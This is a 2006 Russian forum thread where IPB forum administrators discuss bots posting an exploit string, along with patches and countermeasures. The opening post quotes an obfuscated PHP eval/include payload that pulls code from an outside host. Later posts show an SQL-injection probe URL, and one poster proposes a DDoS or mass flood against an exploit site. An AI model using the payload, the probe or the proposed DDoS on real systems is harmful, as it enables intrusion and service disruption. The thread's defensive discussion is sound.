WildCat Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 Замахался сегодня банить и удалять... удалять и банить... Постят, козлы, строку r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53).chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //Интересно, на что надеются? Ссылка на комментарий Поделиться на других сайтах Прочее
.silent Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 инклуд какой-то бодяги _http://rst.void.ru/r57ipbinc.txtв общем, бред какой-то Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 Я с утра у себя то же самое обнаружила..В теме про уязвимости вроде ссылка была сегодня на эксплойт..Похоже тестили. Ссылка на комментарий Поделиться на других сайтах Прочее
.silent Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 Обновление безопасности в IPB 2.x.x (25.04.06) это защита именно от этого эксплоита Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 Ну так мы ж пропатчились Раздражает мусор в темах просто.. Ссылка на комментарий Поделиться на других сайтах Прочее
Destruction Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 Матфильтр воткнуть, ИМХО :-) Ссылка на комментарий Поделиться на других сайтах Прочее
.silent Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 а, кстати, неплохая идея Ссылка на комментарий Поделиться на других сайтах Прочее
naka Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 justxplгы Ссылка на комментарий Поделиться на других сайтах Прочее
Ashes Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 понту в матофильтр, любое полусознательное смогет заменить пост на ПРЕВЕД !!! а завтра будем чистить форумы я сплоит сильно не копал, но по моему из этого сплоита флудер ну просто атличный Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 27 Апреля 2006 Жалоба Поделиться Опубликовано 27 Апреля 2006 я сплоит сильно не копал, но по моему из этого сплоита флудер ну просто атличныйНу и как бум защищатся-то от этого? Ссылка на комментарий Поделиться на других сайтах Прочее
superbivis Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 я сплоит сильно не копал, но по моему из этого сплоита флудер ну просто атличныйНу и как бум защищатся-то от этого? Случаем нет презервативов для IPB? Что то вроде IPCondom 1.0 Ссылка на комментарий Поделиться на других сайтах Прочее
Neo[CCCP] Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 Добрый юзер в ПМ прислал:www.forum/index.php?act=members&st=%20-1[sql%20code] Это что? :-) Оно работает, или исправлено? ПыСы, сорри, за офтоп :-) Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 ' date='28.4.2006, 9:56' post='176562']Добрый юзер в ПМ прислал:www.forum/index.php?act=members&st=%20-1[sql%20code] Это что? :-) Оно работает, или исправлено?Раз увидел строку, а не резуьтат ее выполнения - знать исправлено Ссылка на комментарий Поделиться на других сайтах Прочее
ImUgh Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 FatCatРаз увидел строку, а не резуьтат ее выполнения - знать исправленоничего оно не значит.тот баг работает(а он вообще разве работает?) при переходе по подобной ссылке Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 Меня уже достали тестеры эксплойта.Аж по три темы содают. И, главное, идиоты не понимают, что их айпи я вижу не только там, но и здесь..Так что перспектива быть забаненными в обоих местах вполне реальна. Ссылка на комментарий Поделиться на других сайтах Прочее
Ashes Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 ой, как будто тяжело дописать перебор по проксям, запаришься банить, и что банить ? прокси ? сенсу ? Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 28 Апреля 2006 Жалоба Поделиться Опубликовано 28 Апреля 2006 Да не юзают они прокси.Это глупые дети в основном, которым делать нефиг. Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 29 Апреля 2006 Жалоба Поделиться Опубликовано 29 Апреля 2006 Скрипт не передает агента (т.е. браузер)можно времено по этому признаку отрезатьХотя это только дело времени... блин Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 29 Апреля 2006 Жалоба Поделиться Опубликовано 29 Апреля 2006 У них какое-то весеннее обострение.Достали малолетние кулхацкеры или недоразвитые придурки, ибо нормальный юзер никогда мой форум ломать не станет. Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 29 Апреля 2006 Жалоба Поделиться Опубликовано 29 Апреля 2006 FisanaСогласен на счет весеннего обострения у меня тже такая мысля воникала И все же надо придумать как это это скрипта обезопаситсяведь им можно элементарно задосить форум... Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 29 Апреля 2006 Жалоба Поделиться Опубликовано 29 Апреля 2006 Я патчусь вовремя и форум вроде защищен.Но тут какой-нить типчик вначале регится в паре десятков экземпляров, а потом флудит (см. первый пост).Особенно раздражает, что это дрянь растекается и ломает таблицу форума, поэтому удаляю тут же.А то бы оставила для следующих хацкеров, чтобы видели - здесь ловить нечего.Потом придурок долго сидит в поиске...Но как-то все-таки непонятно, зачем ломать форум, где раздают скины. Просто психология этих людей ублюдочная имхо. Ссылка на комментарий Поделиться на других сайтах Прочее
WildCat Опубликовано 30 Апреля 2006 Автор Жалоба Поделиться Опубликовано 30 Апреля 2006 Опять ублюдочная скотина нагадила по всему форуму мне.. И в топике "Зацени!" оставила ссылку на http://www.exploit.in/forum/ Предлагаю собраться кучей и увалить это добро: телега в саппорт, ддос или просто массированный флуд Ссылка на комментарий Поделиться на других сайтах Прочее
freeman85 Опубликовано 30 Апреля 2006 Жалоба Поделиться Опубликовано 30 Апреля 2006 ' date='28.4.2006, 9:56' post='176562']Добрый юзер в ПМ прислал:www.forum/index.php?act=members&st=%20-1[sql%20code] Это что? :-) Оно работает, или исправлено? ПыСы, сорри, за офтоп :-) у меня выдала SQL ошибку, все заплатки стоят... значит у меня, это место дыряво? Ссылка на комментарий Поделиться на других сайтах Прочее
WildCat Опубликовано 30 Апреля 2006 Автор Жалоба Поделиться Опубликовано 30 Апреля 2006 У меня вместо ошибки - список участников, все ок Ссылка на комментарий Поделиться на других сайтах Прочее
.silent Опубликовано 30 Апреля 2006 Жалоба Поделиться Опубликовано 30 Апреля 2006 через intval, наверное, следует пропустить эту бодяжку. хотя, у большинства все ок.в любом случае через limit взломать вряд ли что выйдет Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения